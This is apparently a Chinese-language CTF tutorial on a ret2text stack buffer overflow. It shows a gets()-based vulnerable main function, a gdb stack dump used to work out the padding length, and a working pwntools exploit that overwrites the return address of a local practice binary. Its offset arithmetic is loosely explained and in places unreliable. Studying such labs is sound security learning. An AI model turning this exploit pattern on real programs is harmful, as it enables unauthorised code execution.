1. 溢出数据该填多长

并不是所有栈rsp到rbp的存放一个变量,有的栈溢出是从中间开始的覆盖到rbp要计算更为精准的计算栈溢出是尤为重要的

2. 源码分析

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s[100]; // [esp+1Ch] [ebp-64h] BYREF

  setvbuf(stdout, 0, 2, 0);
  setvbuf(_bss_start, 0, 1, 0);
  puts("There is something amazing here, do you know anything?");
  gets(s);
  printf("Maybe I will tell you next time !");
  return 0;
}

如何计算s溢出所需的大小 使用Gdb 下断点到gets这个函数

00:0000│ esp   0xffffd100 —▸ 0xffffd11c ◂— 'aaaaaaa'
01:0004│-084   0xffffd104 ◂— 0x0
02:0008│-080   0xffffd108 ◂— 0x1
03:000c│-07c   0xffffd10c ◂— 0x0
... ↓          2 skipped
06:0018│-070   0xffffd118 —▸ 0xf7ffd000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x2bf24
07:001c│ eax   0xffffd11c ◂— 'aaaaaaa' 
08:0020│ edx-3 0xffffd120 ◂— 0x616161 /* 'aaa' */
09:0024│-064   0xffffd124 ◂— 0x1
0a:0028│-060   0xffffd128 ◂— 0x1000
0b:002c│-05c   0xffffd12c —▸ 0xffffd22c —▸ 0xffffd3f1 ◂— 'SHELL=/bin/bash'
0c:0030│-058   0xffffd130 —▸ 0xf7fb1224 (__elf_set___libc_subfreeres_element_free_mem__) —▸ 0xf7f3a870 (free_mem) ◂— endbr32 
0d:0034│-054   0xffffd134 ◂— 0x80000
0e:0038│-050   0xffffd138 —▸ 0xf7fb3000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1ead6c
0f:003c│-04c   0xffffd13c —▸ 0xf7fb64e8 (__exit_funcs_lock) ◂— 0x0
10:0040│-048   0xffffd140 —▸ 0xf7fb3000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1ead6c
11:0044│-044   0xffffd144 —▸ 0xf7fe22b0 (_dl_fini) ◂— endbr32 
12:0048│-040   0xffffd148 ◂— 0x0
13:004c│-03c   0xffffd14c —▸ 0x8048425 (_init+9) ◂— add ebx, 0x1bdb
14:0050│-038   0xffffd150 —▸ 0xf7fb33fc (__exit_funcs) —▸ 0xf7fb4180 (initial) ◂— 0x0
15:0054│-034   0xffffd154 ◂— 0x1
16:0058│-030   0xffffd158 —▸ 0x804a000 (_GLOBAL_OFFSET_TABLE_) —▸ 0x8049f14 (_DYNAMIC) ◂— 0x1
17:005c│-02c   0xffffd15c —▸ 0x8048722 (__libc_csu_init+82) ◂— add edi, 1
18:0060│-028   0xffffd160 ◂— 0x1
19:0064│-024   0xffffd164 —▸ 0xffffd224 —▸ 0xffffd3d4 ◂— 0x6d6f682f ('/hom')
1a:0068│-020   0xffffd168 —▸ 0xffffd22c —▸ 0xffffd3f1 ◂— 'SHELL=/bin/bash'
1b:006c│-01c   0xffffd16c —▸ 0xf7dfc469 (__cxa_atexit+41) ◂— add esp, 0x1c
1c:0070│-018   0xffffd170 —▸ 0xf7fe22b0 (_dl_fini) ◂— endbr32 
1d:0074│-014   0xffffd174 ◂— 0x0
1e:0078│-010   0xffffd178 —▸ 0x80486db (__libc_csu_init+11) ◂— add ebx, 0x1925
1f:007c│-00c   0xffffd17c ◂— 0x0
20:0080│-008   0xffffd180 —▸ 0xf7fb3000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1ead6c
21:0084│-004   0xffffd184 —▸ 0xf7fb3000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1ead6c
22:0088│ ebp   0xffffd188 ◂— 0x0

可以看到是从0xffffd11存储这s的值,计算溢出需要计算ebp到0xffffd11这之间的长度 从这个可以看到0d:0034│-054 0xffffd134 ◂— 0x80000
0x54(偏移量)+(栈帧大小)0x4 = 0x6c(0xffffd11的溢出大小)
0x6c+0x4(RBP的栈帧大小) + ret (要跳转的地址)

3. Exp构造

from pwn import *  

r = process("./ret2text")
raw_input()
addr = 0x804863a  


p = b"A"*(0x6c+0x4)+p32(addr)

r.recvuntil('anything?\n')

r.sendline(p)
r.interactive()